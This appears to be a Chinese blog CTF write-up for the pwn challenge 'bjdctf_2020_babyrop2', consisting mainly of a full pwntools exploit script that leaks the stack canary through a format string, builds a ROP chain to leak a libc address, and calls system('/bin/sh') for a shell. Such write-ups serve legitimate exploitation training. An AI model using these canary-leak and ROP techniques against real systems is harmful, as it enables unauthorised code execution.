bjdctf_2020_babyrop2

骑猪看日落 2023-02-23 08:15 121阅读 0赞

在这里插入图片描述
注意这题开启了Canary

在这里插入图片描述
因为限制了payload长度就不可以写got表了，但是可以直接泄露Canary值，在vuln中进行栈溢出即可拿到shell…

exp

from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
proc_name = './bjdctf_2020_babyrop2'
elf = ELF(proc_name)
p = process(proc_name)
p = remote('node3.buuoj.cn', 27936)
main_addr = elf.sym['main']
vuln_addr = elf.sym['vuln']
pop_rdi_ret = 0x400993
read_got = elf.got['read']
puts_plt = elf.plt['puts']
p.sendlineafter('u!', b'%11$p')
p.recv()
canary = p.recvuntil('\n')[:-1]
log.info(canary)
payload = b'a' * (0x20 - 8) + p64(int(canary.decode(), 16)) + p64(0) + p64(pop_rdi_ret) + p64(read_got) + p64(puts_plt) + p64(vuln_addr)
p.sendafter('story!', payload)
p.recv()
read_addr = u64(p.recv(6).ljust(0x8, b'\x00'))
log.info(hex(read_addr))
libc = LibcSearcher('read', read_addr)
libc_base = read_addr - libc.dump('read')
system_addr = libc_base + libc.dump('system')
str_bin_sh = libc_base + libc.dump('str_bin_sh')
payload1 = b'a' * (0x20 - 8) + p64(int(canary.decode(), 16)) + p64(0) + p64(pop_rdi_ret) + p64(str_bin_sh) + p64(system_addr) + p64(main_addr)
p.sendafter('story!', payload1)
p.interactive()

在这里插入图片描述

发表评论取消回复

表情：

评论列表（有 0 条评论，121人围观）

还没有评论，来说两句吧...

相关阅读

相关 [BJDCTF 2nd]secret&&inndy_rop

\[BJDCTF 2nd\]secret ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_a

约定不等于承诺〃/ 2023年02月28日 05:22/ 0 赞/ 83 阅读

相关 bjdctf_2020_router

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ub

太过爱你忘了你带给我的痛/ 2023年02月23日 08:16/ 0 赞/ 72 阅读

相关 bjdctf_2020_babyrop2

![在这里插入图片描述][20200705233227679.png] 注意这题开启了Canary ![在这里插入图片描述][watermark_type_ZmFuZ3p

骑猪看日落/ 2023年02月23日 08:15/ 0 赞/ 122 阅读

相关 bjdctf_2020_babystack2

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ub

àì夳堔傛蜴生んèń/ 2023年02月21日 12:44/ 0 赞/ 104 阅读

相关 [BJDCTF 2nd]ydsneedgirlfriend2[use after free]

![在这里插入图片描述][20200626171146938.png] 有符号表，而且直接留了后门！ ![在这里插入图片描述][watermark_type_ZmFuZ

分手后的思念是犯贱/ 2023年02月20日 12:09/ 0 赞/ 93 阅读

相关 bjdctf_2020_babyrop

![在这里插入图片描述][20200623221750619.png] exp from pwn import from LibcSearcher im

「爱情、让人受尽委屈。」/ 2023年02月20日 06:28/ 0 赞/ 118 阅读

相关 [BJDCTF 2nd]test

ssh ctf@node3.buuoj.cn -p <port> ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_sh

浅浅的花香味﹌/ 2023年02月20日 04:52/ 0 赞/ 106 阅读

相关 bjdctf_2020_babystack

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ub

淡淡的烟草味﹌/ 2023年02月17日 11:22/ 0 赞/ 92 阅读

相关 [BJDCTF 2nd]one_gadget

![在这里插入图片描述][2020061211542959.png] ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shad

妖狐艹你老母/ 2023年02月17日 03:55/ 0 赞/ 103 阅读

相关 [BJDCTF 2nd]r2t3

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ub

梦里梦外;/ 2023年02月17日 02:37/ 0 赞/ 94 阅读